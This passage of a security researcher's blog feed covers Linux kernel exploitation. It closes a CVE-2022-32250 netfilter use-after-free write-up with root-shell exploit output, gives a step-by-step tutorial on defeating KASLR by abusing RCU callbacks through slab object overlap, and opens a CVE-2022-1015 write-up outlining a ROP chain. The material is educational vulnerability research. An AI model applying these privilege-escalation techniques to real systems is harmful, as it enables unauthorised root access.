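		path[1 + i] = (char)((prev &gt;&gt; (8 * i)) &amp; 0xff);
}
</code></pre>
<p>Starting from a buffer holding <code class="language-plaintext highlighter-rouge">/sbin/modprobe</code> and the <code class="language-plaintext highlighter-rouge">heap_base</code> of <code class="language-plaintext highlighter-rouge">0xffff91d900000000</code> from the sample run below, calling <code class="language-plaintext highlighter-rouge">overwrite_path(buf, heap_base + 0x2f706d74)</code> leaves <code class="language-plaintext highlighter-rouge">/tmp/\xd9\x91\xff\xffprobe</code> in the buffer.</p>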

<p>Now it is a matter of placing the fake modprobe at this path and executing the <code class="language-plaintext highlighter-rouge">trigger</code> binary.</p>

<h2 id="proof-of-concept-">Proof-of-Concept <a name="poc"></a></h2>
<p>The PoC is available at <a href="https://github.com/ysanatomic/CVE-2022-32250-LPE">https://github.com/ysanatomic/CVE-2022-32250-LPE</a>.</p>

<pre><code class="language-txt"># ./exploit
[*] CVE-2022-32250 LPE Exploit by @YordanStoychev

uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
[*] Setting up user+network namespace sandbox

uid=0(root) gid=0(root) groups=0(root)

[+] STAGE 1: Heap leak
[*] Socket is opened.
[*] Table table1 created.
[*] Socket is opened.
[*] Table table2 created.
[*] Socket is opened.
[*] Table table3 created.
[*] Set created
[*] Set with UAF'd expression created
[*] Set with UAF'd expression created
[&amp;] heap_addr: 0xffff91d97f89f398
[&amp;] heap_base: 0xffff91d900000000

[+] STAGE 2: KASLR bypass
[*] Set created
[*] Set with UAF'd expression created
[*] Set with UAF'd expression created
[&amp;] kaddr: 0xffffffff9f54bef0
[&amp;] kbase: 0xffffffff9f000000

[+] STAGE 3: modprobe_path overwrite
[*] Set created
[*] Set with UAF'd expression created
[*] Set with UAF'd expression created

[*] STAGE 4: Escalation
[*] Setting up the fake modprobe...
[*] modprobe_path: /tmp/ّprobe
[*] Setting up the shell...
[*] Triggering the modprobe...
[*] Executing shell...
/ #
</code></pre>

<h2 id="closing-remarks-">Closing Remarks <a name="closing"></a></h2>
<p>Analysing and Exploiting this vulnerability was lots of fun. Initially, I planned to do everything from analysing it to making the exploit live on stream but I started doing more and more off-stream and then I just finished it up off-stream. I might make one last stream/video where I go over the final exploit in detail.</p>

<p>Took me some time to sit down and finish up the write-up - but better late than never.</p>

<p>If you have any questions feel free to hit me up on Twitter or by email.</p>]]></content><author><name></name></author><summary type="html"><![CDATA[A Use-After-Free in Netfilter leading to Local Privilege Escalation]]></summary></entry><entry><title type="html">Abusing RCU callbacks with a Use-After-Free read to defeat KASLR</title><link href="/abusing_rcu_callbacks_to_defeat_kaslr/" rel="alternate" type="text/html" title="Abusing RCU callbacks with a Use-After-Free read to defeat KASLR" /><published>2023-01-04T14:00:00+00:00</published><updated>2023-01-04T14:00:00+00:00</updated><id>/abusing-rcu-to-defeat-kaslr</id><content type="html" xml:base="/abusing_rcu_callbacks_to_defeat_kaslr/"><![CDATA[<h2 id="introduction">Introduction</h2>
<p>In this article, I will be walking you through a clever technique that can be used to leak addresses and defeat KASLR in the Linux Kernel when you have a certain type of Use-After-Free by abusing RCU callbacks. It is by no means a novel technique and has most likely been leveraged in several exploits.</p>

<p>This is a guide meant to give you a solid understanding of the technique as quickly as possible.</p>
<blockquote>
  <p>This article was supposed to come out 2 weeks ago but it was delayed due to the Christmas holidays.</p>
</blockquote>

<h2 id="table-of-contents">Table of Contents</h2>
<ol>
  <li><a href="#technique">The Technique in a nutshell</a></li>
  <li><a href="#criteria">Criteria</a>
    <ul>
      <li><a href="#uaf">A certain type of Use-After-Free</a></li>
      <li><a href="#oobread">A specific OOB read</a></li>
      <li><a href="#spray">Ability to spray objects</a></li>
    </ul>
  </li>
  <li><a href="#analysis">Analysis</a>
    <ul>
      <li><a href="#reading_primitive">Reading Primitive</a>
        <ul>
          <li><a href="#user_key_payload">user_key_payload</a></li>
          <li><a href="#posix_msg_tree_node">posix_msg_tree_node</a></li>
          <li><a href="#msg_msg">msg_msg</a></li>
        </ul>
      </li>
      <li><a href="#frankenstein">Frankensteining everything together</a></li>
    </ul>
  </li>
  <li><a href="#resources">Resources</a></li>
  <li><a href="#summary">Summary</a></li>
</ol>

<h2 id="the-technique-in-a-nutshell-">The Technique in a nutshell <a name="technique"></a></h2>
<p>The technique is possible when we control two objects allocated next to each other in the same slab cache. We must be able to read out-of-bounds through the first object, while the second object must have an <code class="language-plaintext highlighter-rouge">rcu_head</code> as its first member.</p>

<p>If we make a call to update the second object, the kernel will call <code class="language-plaintext highlighter-rouge">call_rcu</code>, which populates <code class="language-plaintext highlighter-rouge">rcu_head-&gt;func</code>. If we can then read OOB through the first object into the second object’s <code class="language-plaintext highlighter-rouge">rcu_head</code> without sleeping (so as not to let the kernel run <code class="language-plaintext highlighter-rouge">rcu_head-&gt;func()</code>, which frees the memory and may zero it out if it is sensitive), we can leak the address stored in <code class="language-plaintext highlighter-rouge">rcu_head-&gt;func</code> and thereby defeat KASLR.</p>

<p>Now that we have a general summary of the technique it is time to go more in-depth.</p>

<h2 id="criteria-">Criteria <a name="criteria"></a></h2>
<p>We have some criteria that have to be met to be able to use this technique.</p>

<h3 id="a-certain-type-of-use-after-free-">A certain type of Use-After-Free <a name="uaf"></a></h3>
<p>This technique applies to objects that meet the following requirements:</p>
<ul>
  <li>The object that gets UAF’d must be in a linked list.</li>
  <li>The <code class="language-plaintext highlighter-rouge">list_head</code> of the object must be at offset 16 bytes or more relative to the start of the object.</li>
  <li>You must be able to get multiple objects that get UAF’d in a linked list with one another.</li>
</ul>

<h3 id="a-specific-oob-read-">A specific OOB read <a name="oobread"></a></h3>
<p>We need to have a primitive capable of reading at least 16 bytes out-of-bounds for the slab object. However, it is important to mention that read sizes cannot go over the size limit of the slab cache. So if you are reading from an object in <code class="language-plaintext highlighter-rouge">kmalloc-64</code> you can read up to 64 bytes before the kernel detects the memory leak if the option <code class="language-plaintext highlighter-rouge">CONFIG_HARDENED_USERCOPY</code> is on (and chances are it is on the target). This means that your read needs to start at an offset of at least 16 bytes from the start of the slab object to be able to read 16 bytes out-of-bounds.</p>

<blockquote>
  <p>Ex: If you have a <code class="language-plaintext highlighter-rouge">kmalloc-64</code> slab object that occupies the address range from <code class="language-plaintext highlighter-rouge">0x20</code> to <code class="language-plaintext highlighter-rouge">0x60</code>, your read must start at address <code class="language-plaintext highlighter-rouge">0x30</code> (offset 16 into the object) to be able to read 16 bytes out-of-bounds for the slab object (up to <code class="language-plaintext highlighter-rouge">0x70</code>).</p>
</blockquote>
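<p>To make the arithmetic concrete, here is a minimal sketch in plain userspace C (not kernel code). The helper name <code class="language-plaintext highlighter-rouge">oob_bytes</code> is made up for illustration; the only thing it assumes is the rule described above, namely that a single read can be at most as long as the slab object.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stddef.h&gt;

/*
 * Number of bytes that land past the end of the slab object when a read of
 * read_len bytes starts at start_off inside an object of slab_size bytes.
 * Returns 0 when the read stays in bounds.
 */
size_t oob_bytes(size_t start_off, size_t read_len, size_t slab_size)
{
	size_t end = start_off + read_len;

	return end &gt; slab_size ? end - slab_size : 0;
}
</code></pre></div></div>
<p>With the read length capped at the object size, the number of out-of-bounds bytes equals the start offset: <code class="language-plaintext highlighter-rouge">oob_bytes(16, 64, 64)</code> gives 16, while a read that starts at offset 0 never leaves the object.</p>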

<p>It might be a little difficult to find OOB read primitives like this but they exist even if somewhat conditionally (those OOB reads could only be achieved if the previous conditions about the type of Use-After-Free are met). More on that later.</p>

<h3 id="ability-to-spray-objects-">Ability to spray objects <a name="spray"></a></h3>
<p>We need to be able to spray objects that have <code class="language-plaintext highlighter-rouge">rcu_head</code> as their first member. We must also be able to ‘update’ those objects.</p>

<blockquote>
  <p>The objects that will be sprayed must be allocated with the same GFP flag as the primitive that is used for reading. Otherwise, they won’t be allocated in the same caches.</p>
</blockquote>

<h2 id="analysis-">Analysis <a name="analysis"></a></h2>
<p>I will provide a simple (fake) example case and go over how the technique could be applied.</p>
<blockquote>
  <p>For a real case where this technique is used: I have a write-up coming out soon of a vulnerability where I use this very trick to leak an address and bypass KASLR.</p>
</blockquote>

<p>Let’s have a type <code class="language-plaintext highlighter-rouge">vuln_obj</code>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">vuln_obj</span> <span class="p">{</span>
	<span class="kt">uint64_t</span> <span class="n">int1</span><span class="p">;</span> <span class="c1">// @0</span>
	<span class="kt">uint64_t</span> <span class="n">int2</span><span class="p">;</span> <span class="c1">// @8</span>
	<span class="kt">uint64_t</span> <span class="n">int3</span><span class="p">;</span> <span class="c1">// @16</span>
	<span class="k">struct</span> <span class="n">list_head</span> <span class="n">list</span><span class="p">;</span> <span class="c1">// @24 - matches the requirement for the list_head </span>
	<span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">data</span><span class="p">[</span><span class="mi">16</span><span class="p">];</span> <span class="c1">// @40</span>
<span class="p">};</span>
</code></pre></div></div>
<p>We can freely make calls to the kernel that will allocate this structure with the flag <code class="language-plaintext highlighter-rouge">GFP_KERNEL</code>. All objects of this type are allocated in <code class="language-plaintext highlighter-rouge">kmalloc-64</code> and all objects of this type are in a linked list together. We can also make calls to free structures of this type. However, the kernel does not unlink the object that gets freed from the linked list.</p>

<p>This is our vulnerability: a <code class="language-plaintext highlighter-rouge">vuln_obj</code> object gets freed but it is not removed from the linked list and the previous and next objects in the list hold pointers to it. This causes a Use-After-Free and <code class="language-plaintext highlighter-rouge">vuln_obj</code> meets all the criteria we set prior.</p>
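<p>Since <code class="language-plaintext highlighter-rouge">vuln_obj</code> is a made-up type, the bug can be modelled in userspace. The sketch below is only an illustration: <code class="language-plaintext highlighter-rouge">struct slot</code>, <code class="language-plaintext highlighter-rouge">buggy_free</code> and <code class="language-plaintext highlighter-rouge">has_dangling_link</code> are hypothetical names, the <code class="language-plaintext highlighter-rouge">list_head</code> is a stand-in for the kernel one, and the "free" is modelled with a flag so nothing is actually released. It assumes a 64-bit (LP64) target.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stdbool.h&gt;
#include &lt;stddef.h&gt;
#include &lt;stdint.h&gt;

/* Userspace stand-in for the kernel's struct list_head. */
struct list_head {
	struct list_head *next, *prev;
};

struct vuln_obj {
	uint64_t int1;          /* @0  */
	uint64_t int2;          /* @8  */
	uint64_t int3;          /* @16 */
	struct list_head list;  /* @24 */
	unsigned char data[16]; /* @40 */
};

/* 56 bytes on LP64, so an allocation would be served from kmalloc-64. */
_Static_assert(offsetof(struct vuln_obj, list) == 24, "list_head at offset 24");
_Static_assert(sizeof(struct vuln_obj) == 56, "fits a 64-byte slab object");

void list_add_tail(struct list_head *entry, struct list_head *head)
{
	entry-&gt;prev = head-&gt;prev;
	entry-&gt;next = head;
	head-&gt;prev-&gt;next = entry;
	head-&gt;prev = entry;
}

/* Hypothetical model of a slab slot: the object plus a "freed" marker. */
struct slot {
	struct vuln_obj obj;
	bool freed;
};

/* The buggy free path: the slot is released but never unlinked. */
void buggy_free(struct slot *s)
{
	s-&gt;freed = true; /* missing: remove s-&gt;obj.list from the list */
}

/* Returns true if live neighbours still point at the freed object. */
bool has_dangling_link(void)
{
	struct list_head head = { &amp;head, &amp;head };
	struct slot a = {0}, b = {0}, c = {0};

	list_add_tail(&amp;a.obj.list, &amp;head);
	list_add_tail(&amp;b.obj.list, &amp;head);
	list_add_tail(&amp;c.obj.list, &amp;head);

	buggy_free(&amp;b);

	return b.freed &amp;&amp; a.obj.list.next == &amp;b.obj.list
		       &amp;&amp; c.obj.list.prev == &amp;b.obj.list;
}
</code></pre></div></div>
<p>After <code class="language-plaintext highlighter-rouge">buggy_free</code> the neighbours of the freed object still hold its address, which is exactly the state we rely on later.</p>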

<h3 id="read-primitive-">Read Primitive <a name="reading_primitive"></a></h3>
<p>Now that we have introduced our example vulnerable object we need to look for a read primitive that matches the conditions we set earlier.</p>

<p>A primitive like that won’t be found just lying around - we need to work a bit to get it. Our <code class="language-plaintext highlighter-rouge">vuln_obj</code> is allocated in <code class="language-plaintext highlighter-rouge">kmalloc-64</code> so we are looking for objects that get allocated in that slab cache. In this example, we are going to be leveraging objects belonging to the <strong>in-kernel key management and retention facility</strong> and the <strong>message queue</strong> system of the kernel.</p>

<h4 id="user_key_payload-">user_key_payload <a name="user_key_payload"></a></h4>
<p>Objects of type <code class="language-plaintext highlighter-rouge">user_key_payload</code> hold the payload of <strong>user and logon keys</strong>. This type plays the main role in our story.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* include/keys/user-type.h */</span>
<span class="k">struct</span> <span class="n">user_key_payload</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">rcu_head</span>	<span class="n">rcu</span><span class="p">;</span>		<span class="cm">/* RCU destructor */</span> <span class="c1">// @0 - 16 bytes</span>
	<span class="kt">unsigned</span> <span class="kt">short</span>	<span class="n">datalen</span><span class="p">;</span>	<span class="cm">/* length of payload */</span> <span class="c1">// @16 - 2 bytes</span>
	<span class="kt">char</span>		<span class="n">data</span><span class="p">[]</span> <span class="n">__aligned</span><span class="p">(</span><span class="n">__alignof__</span><span class="p">(</span><span class="n">u64</span><span class="p">));</span> <span class="cm">/* actual payload */</span> <span class="c1">// @24</span>
<span class="p">};</span>

<span class="k">struct</span> <span class="n">callback_head</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">callback_head</span> <span class="o">*</span><span class="n">next</span><span class="p">;</span> <span class="c1">// @0</span>
	<span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">func</span><span class="p">)(</span><span class="k">struct</span> <span class="n">callback_head</span> <span class="o">*</span><span class="n">head</span><span class="p">);</span> <span class="c1">// @8 rcu_head-&gt;func </span>
<span class="p">}</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">))));</span>
<span class="cp">#define rcu_head callback_head
</span></code></pre></div></div>
<p>This object will be the one we will leak KASLR through (by reading the <code class="language-plaintext highlighter-rouge">rcu-&gt;func</code> pointer at offset 8 bytes).</p>
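<p>The offsets in the comments above can be double-checked with a userspace mirror of the two structures. This is a sketch under assumptions: it targets a 64-bit (LP64) build with GCC or Clang, and <code class="language-plaintext highlighter-rouge">lands_in_class</code> is a hypothetical helper that tells us which payload lengths put the whole object (24-byte header plus payload) in a given size class, for example (32, 64] for <code class="language-plaintext highlighter-rouge">kmalloc-64</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stddef.h&gt;

/* Userspace mirror of the kernel structures quoted above. */
struct callback_head {
	struct callback_head *next;
	void (*func)(struct callback_head *head);
};

struct user_key_payload {
	struct callback_head rcu;
	unsigned short datalen;
	char data[] __attribute__((aligned(__alignof__(unsigned long long))));
};

_Static_assert(offsetof(struct user_key_payload, rcu.func) == 8, "func at offset 8");
_Static_assert(offsetof(struct user_key_payload, datalen) == 16, "datalen at offset 16");
_Static_assert(offsetof(struct user_key_payload, data) == 24, "payload at offset 24");

/*
 * Does a payload of datalen bytes make the whole object fall into the
 * size class (lower, upper]?
 */
int lands_in_class(size_t datalen, size_t lower, size_t upper)
{
	size_t total = offsetof(struct user_key_payload, data) + datalen;

	return total &gt; lower &amp;&amp; total &lt;= upper;
}
</code></pre></div></div>
<p>Under these assumptions a payload of 9 to 40 bytes keeps the object in <code class="language-plaintext highlighter-rouge">kmalloc-64</code>, next to our <code class="language-plaintext highlighter-rouge">vuln_obj</code> objects.</p>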

<h4 id="posix_msg_tree_node-">posix_msg_tree_node <a name="posix_msg_tree_node"></a></h4>
<p>In the message queue subsystem, all the messages (<code class="language-plaintext highlighter-rouge">struct msg_msg</code>) belonging to a certain queue are in a linked list together. The start (the root) of the queue is a <code class="language-plaintext highlighter-rouge">struct posix_msg_tree_node</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">posix_msg_tree_node</span> <span class="p">{</span>
    <span class="k">struct</span> <span class="n">rb_node</span>      <span class="n">rb_node</span><span class="p">;</span> <span class="c1">// of size 0x18 = 24 bytes</span>
    <span class="k">struct</span> <span class="n">list_head</span>    <span class="n">msg_list</span><span class="p">;</span> <span class="c1">// @24 (is 16 bytes)</span>
    <span class="kt">int</span>         <span class="n">priority</span><span class="p">;</span> <span class="c1">// @40</span>
<span class="p">};</span>

<span class="k">struct</span> <span class="n">rb_node</span> <span class="p">{</span>
    <span class="kt">unsigned</span> <span class="kt">long</span>  <span class="n">__rb_parent_color</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">rb_node</span> <span class="o">*</span><span class="n">rb_right</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">rb_node</span> <span class="o">*</span><span class="n">rb_left</span><span class="p">;</span>
<span class="p">}</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="kt">long</span><span class="p">))));</span>
</code></pre></div></div>
<p>It is allocated with the <code class="language-plaintext highlighter-rouge">GFP_KERNEL</code> flag and as such will be allocated in the same caches as our <code class="language-plaintext highlighter-rouge">vuln_obj</code>.</p>
<blockquote>
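  <p>However, interestingly enough, messages in the queue are allocated with the flag <code class="language-plaintext highlighter-rouge">GFP_KERNEL_ACCOUNT</code> and reside in the <code class="language-plaintext highlighter-rouge">kmalloc-cg-n</code> caches. So in our case <code class="language-plaintext highlighter-rouge">msg_msg</code> is not a viable primitive.</p>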
</blockquote>

<p>We do not possess direct control over objects of this type but we can freely allocate them by creating message queues.</p>
<blockquote>
  <p>Technically, the <code class="language-plaintext highlighter-rouge">posix_msg_tree_node</code> for each queue gets allocated when the first message is added to the queue and not when the queue is created.</p>
</blockquote>

<p>Let’s check how <code class="language-plaintext highlighter-rouge">posix_msg_tree_node</code> overlaps with <code class="language-plaintext highlighter-rouge">vuln_obj</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Obj: vuln_obj ; posix_msg_tree_node
@0:  int1     ; __rb_parent_color
@8:  int2     ; *rb_right
@16: int3     ; *rb_left
@24: list     ; msg_list 
</code></pre></div></div>
<p>Here <code class="language-plaintext highlighter-rouge">posix_msg_tree_node</code> is suitable as a primitive because the linked list <code class="language-plaintext highlighter-rouge">msg_list</code> aligns with <code class="language-plaintext highlighter-rouge">vuln_obj.list</code> (at offset 24 bytes).</p>

<p>If we manage to allocate a <code class="language-plaintext highlighter-rouge">posix_msg_tree_node</code> in the same slab object where a <code class="language-plaintext highlighter-rouge">vuln_obj</code> used to reside, we can influence <code class="language-plaintext highlighter-rouge">msg_list-&gt;next</code> and <code class="language-plaintext highlighter-rouge">msg_list-&gt;prev</code> via the use-after-free (by allocating other <code class="language-plaintext highlighter-rouge">vuln_obj</code> objects).</p>

<h4 id="msg_msg-">msg_msg <a name="msg_msg"></a></h4>
<p>This structure holds messages belonging to the message queue system of the kernel.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* one msg_msg structure for each message */</span>
<span class="k">struct</span> <span class="n">msg_msg</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">list_head</span> <span class="n">m_list</span><span class="p">;</span> <span class="c1">// @0</span>
	<span class="kt">long</span> <span class="n">m_type</span><span class="p">;</span> <span class="c1">// @16</span>
	<span class="kt">size_t</span> <span class="n">m_ts</span><span class="p">;</span>	<span class="c1">// @24	/* message text size */</span>
	<span class="k">struct</span> <span class="n">msg_msgseg</span> <span class="o">*</span><span class="n">next</span><span class="p">;</span> <span class="c1">// @32</span>
	<span class="kt">void</span> <span class="o">*</span><span class="n">security</span><span class="p">;</span> <span class="c1">// @40</span>
	<span class="cm">/* the actual message follows immediately */</span>
<span class="p">};</span>
</code></pre></div></div>
<p>It is important to note:</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">*security</code> must always hold a valid address to heap memory</li>
  <li>The <code class="language-plaintext highlighter-rouge">list_head</code> of the linked list with all the messages in the queue is <strong>at the start</strong> of the object (in contrast to <code class="language-plaintext highlighter-rouge">vuln_obj</code> where it is at offset 24 bytes).</li>
</ul>

<h3 id="frankensteining-everything-together-">Frankensteining everything together <a name="frankenstein"></a></h3>
<p>Now that we have introduced the objects we need to <strong>frankenstein</strong> them together to achieve the OOB read we need to leak KASLR.</p>

<p>To achieve that we have to do the following:</p>
<ul>
  <li>Make a call to allocate a <code class="language-plaintext highlighter-rouge">vuln_obj</code> object and free it (we shall call this Object 1).</li>
  <li>Allocate a <code class="language-plaintext highlighter-rouge">posix_msg_tree_node</code> of a queue at the UAF’d (Object 1) location.</li>
  <li>Allocate a new <code class="language-plaintext highlighter-rouge">vuln_obj</code> that gets UAF’d (Object 2). The address of its <code class="language-plaintext highlighter-rouge">vuln_obj.list</code> gets written into <code class="language-plaintext highlighter-rouge">posix_msg_tree_node.msg_list.next</code>, so the kernel is fooled into believing that the first message in the message queue starts at <code class="language-plaintext highlighter-rouge">vuln_obj.list</code>. However, <code class="language-plaintext highlighter-rouge">vuln_obj.list</code> is at an offset of 24 bytes while <code class="language-plaintext highlighter-rouge">msg_msg.m_list</code> is at an offset of 0 bytes from the start of the slab object. Therefore we can get 24 bytes of OOB read by reading the first message in the queue (see the diagram below for clarity).</li>
  <li>Allocate a <code class="language-plaintext highlighter-rouge">user_key_payload</code> where <em>Object 2</em> used to be and pass valid heap addresses for <code class="language-plaintext highlighter-rouge">m_list-&gt;next</code> and <code class="language-plaintext highlighter-rouge">m_list-&gt;prev</code> (you need to have leaked a heap address for this - out of scope for this article but could be easily done in our example).</li>
  <li>Allocate a <code class="language-plaintext highlighter-rouge">user_key_payload</code> right under <em>Object 2</em> (this is the payload object whose <code class="language-plaintext highlighter-rouge">rcu-&gt;func</code> we leak).</li>
  <li>Make a call to change the <code class="language-plaintext highlighter-rouge">user_key_payload</code> that is allocated under <em>Object 2</em>.</li>
  <li>Immediately make a call to fetch the first message in the message queue (with a bit of luck <code class="language-plaintext highlighter-rouge">rcu-&gt;func()</code> will not have been called yet).</li>
  <li>And we have the <code class="language-plaintext highlighter-rouge">.text</code> address - defeating KASLR.</li>
</ul>

<blockquote>
  <p>This is a simplification. In reality, to do this reliably you need to spray a ton of <code class="language-plaintext highlighter-rouge">user_key_payload</code> objects to get one right under Object 2. Then you need to mass edit all the payloads and then fetch the first message in the queue.</p>
</blockquote>

<blockquote>
  <p>We said prior that <code class="language-plaintext highlighter-rouge">*security</code> always needs to hold a valid heap address. We don’t have to worry about that as it will overlap with <code class="language-plaintext highlighter-rouge">rcu_head-&gt;next</code>.</p>
</blockquote>

<p><img src="https://i.imgur.com/oQMWv87.png" alt="diagram" /></p>
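<p>The overlap in the diagram can also be checked with a small userspace simulation. This is only a sketch: two adjacent 64-byte slots are modelled as a byte array, the offsets come from the structures shown earlier, and the function names (<code class="language-plaintext highlighter-rouge">read_u64</code>, <code class="language-plaintext highlighter-rouge">leak_func</code>) are hypothetical. No kernel API is involved.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stddef.h&gt;
#include &lt;stdint.h&gt;
#include &lt;string.h&gt;

#define SLAB_SIZE    64 /* kmalloc-64 object size */
#define LIST_OFF     24 /* offsetof(struct vuln_obj, list) */
#define MSG_SEC_OFF  40 /* offsetof(struct msg_msg, security) */
#define MSG_HDR_LEN  48 /* sizeof(struct msg_msg), the text follows */
#define RCU_NEXT_OFF 0  /* offsetof(struct rcu_head, next) */
#define RCU_FUNC_OFF 8  /* offsetof(struct rcu_head, func) */

/* Read a 64-bit value at a byte offset inside the simulated memory. */
uint64_t read_u64(const unsigned char *mem, size_t off)
{
	uint64_t v;

	memcpy(&amp;v, mem + off, sizeof(v));
	return v;
}

/*
 * Slot 0 is Object 2, slot 1 is the user_key_payload right under it.
 * The fake msg_msg begins at Object 2 + 24, so the end of its header
 * and its text spill into slot 1. Returns the first 8 bytes of the
 * "message text" and stores what the kernel would see as
 * msg_msg.security in *security_out.
 */
uint64_t leak_func(uint64_t rcu_next, uint64_t rcu_func, uint64_t *security_out)
{
	unsigned char mem[2 * SLAB_SIZE] = {0};
	size_t neighbour = SLAB_SIZE;
	size_t fake_msg = LIST_OFF;

	/* The rcu_head of the neighbouring payload after it was updated. */
	memcpy(mem + neighbour + RCU_NEXT_OFF, &amp;rcu_next, sizeof(rcu_next));
	memcpy(mem + neighbour + RCU_FUNC_OFF, &amp;rcu_func, sizeof(rcu_func));

	*security_out = read_u64(mem, fake_msg + MSG_SEC_OFF);
	return read_u64(mem, fake_msg + MSG_HDR_LEN);
}
</code></pre></div></div>
<p>The fake message header ends exactly 8 bytes into the neighbouring object: <code class="language-plaintext highlighter-rouge">security</code> lines up with <code class="language-plaintext highlighter-rouge">rcu_head-&gt;next</code> and the first 8 bytes of the message text are <code class="language-plaintext highlighter-rouge">rcu_head-&gt;func</code>.</p>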

<h2 id="resources-">Resources <a name="resources"></a></h2>
<p>Some resources you might want to check out.</p>

<ol>
  <li><a href="https://www.kernel.org/doc/Documentation/RCU/whatisRCU.txt">What is RCU?</a></li>
  <li><a href="https://man7.org/linux/man-pages/man7/mq_overview.7.html">mq_overview</a></li>
  <li><a href="https://man7.org/linux/man-pages/man7/keyrings.7.html">keyrings</a></li>
</ol>

<h2 id="summary-">Summary <a name="summary"></a></h2>
<p>I provided an example which allows the use of this technique. The fake example is very close to the real application of the technique in my next vulnerability write-up (which should be coming out in the next week or two).</p>

<p>I believe the analysis and explanation are not too difficult to grasp but if you have questions feel free to reach out to me.</p>

<p>Keep an eye out for when the write-up drops if you are interested in the <em>“real life”</em> application.</p>]]></content><author><name></name></author><summary type="html"><![CDATA[Introduction In this article, I will be walking you through a clever technique that can be used to leak addresses and defeat KASLR in the Linux Kernel when you have a certain type of Use-After-Free by abusing RCU callbacks. It is by no means a novel technique and has most likely been leveraged in several exploits.]]></summary></entry><entry><title type="html">CVE-2022-1015: A validation flaw in Netfilter leading to Local Privilege Escalation</title><link href="/cve-2022-1015/" rel="alternate" type="text/html" title="CVE-2022-1015: A validation flaw in Netfilter leading to Local Privilege Escalation" /><published>2022-11-11T10:00:00+00:00</published><updated>2022-11-11T10:00:00+00:00</updated><id>/cve-2022-1015</id><content type="html" xml:base="/cve-2022-1015/"><![CDATA[<h2 id="introduction">Introduction</h2>
<p>Hello there! Today we will be reviewing and exploring a vulnerability in the Linux kernel framework Netfilter.</p>

<p>This is meant to be a <em>write-up</em> as much as it is meant to be educational material for people just getting into the kernel vulnerability research space. I attempt to go over everything and not leave anything unexplained so it can be accessible to everyone - including those with little to no experience in vulnerability research. However, knowledge of Linux, assembly and C is assumed.</p>

<p>I recommend reading my article <a href="https://ysanatomic.github.io/netfilter_nf_tables/">Dissecting the Linux Firewall: Introduction to Netfilter’s nf_tables</a> before undertaking this write-up so you have a general idea of the internals of nf_tables.</p>

<p>When I decided that I wanted to explore and review vulnerabilities in the Netfilter framework, I came across <a href="https://twitter.com/pqlqpql">David Bouman’s</a> <a href="https://blog.dbouman.nl/2022/04/02/How-The-Tables-Have-Turned-CVE-2022-1015-1016/">write-up</a> of this very vulnerability.
As the vulnerability proved quite interesting, I decided to do my own write-up reviewing it in <strong>more</strong> detail and going through the process of developing the exploit for it <strong>more</strong> in-depth. My article is quite similar to his in places but diverges greatly in others, namely in the exploitation stage.</p>

<p>The write-up is based on the notes I took while exploring the vulnerability and trying to exploit it, so there are parts where I take a wrong turn or talk about things I missed or did incorrectly at first before figuring them out. I decided to leave those parts in the write-up as they can prove to be educational.</p>

<h2 id="table-of-contents">Table of Contents</h2>
<ol>
  <li><a href="#vuln">The Vulnerability</a>
    <ul>
      <li><a href="#rootcause">Root cause</a></li>
      <li><a href="#parserfunc">Parser Functions</a></li>
      <li><a href="#regtranslation">Register translation</a></li>
      <li><a href="#validationfunc">Validation functions</a></li>
      <li><a href="#bigbut">A big “but”</a></li>
    </ul>
  </li>
  <li><a href="#exploitation">Exploitation</a>
    <ul>
      <li><a href="#primitives">Primitives?</a>
        <ul>
          <li><a href="#imm">nft_immediate_expr</a></li>
          <li><a href="#payload">nft_payload</a></li>
          <li><a href="#payloadset">nft_payload_set</a></li>
          <li><a href="#bitwise">nft_bitwise</a></li>
        </ul>
      </li>
      <li><a href="#explstrat">An Exploitation strategy</a></li>
      <li><a href="#leakingkaddr">Leaking a kernel address</a>
        <ul>
          <li><a href="#nft_do_chain">nft_do_chain</a></li>
          <li><a href="#scoutingkaddr">Scouting for a kernel address</a></li>
          <li><a href="#leakingkaddr">Leaking the address</a></li>
        </ul>
      </li>
      <li><a href="#ceroad">Road to Code Execution</a>
        <ul>
          <li><a href="#outputudp">Output hook + UDP packet</a></li>
          <li><a href="#otherhooks">Trying the other hooks</a></li>
          <li><a href="#expltcp">Exploitation vector through TCP</a></li>
        </ul>
      </li>
      <li><a href="#ropchain">Building an ROP chain</a>
        <ul>
          <li><a href="#prepare_kernel_cred">prepare_kernel_cred</a></li>
          <li><a href="#commit_creds">commit_creds</a></li>
          <li><a href="#switch_task_namespaces">switch_task_namespaces</a></li>
          <li><a href="#swapgs">swapgs_restore_regs_and_return_to_usermode</a></li>
          <li><a href="#summ">Summarizing the ROP chain</a></li>
        </ul>
      </li>
    </ul>
  </li>
  <li><a href="#poc">Proof-of-Concept</a></li>
  <li><a href="#closing">Closing Remarks</a></li>
</ol>

<h2 id="the-vulnerability-">The Vulnerability <a name="vuln"></a></h2>
<p>The vulnerability is in the <code class="language-plaintext highlighter-rouge">nf_tables</code> portion of the netfilter framework. The exact description for CVE-2022-1015 is:</p>
<blockquote>
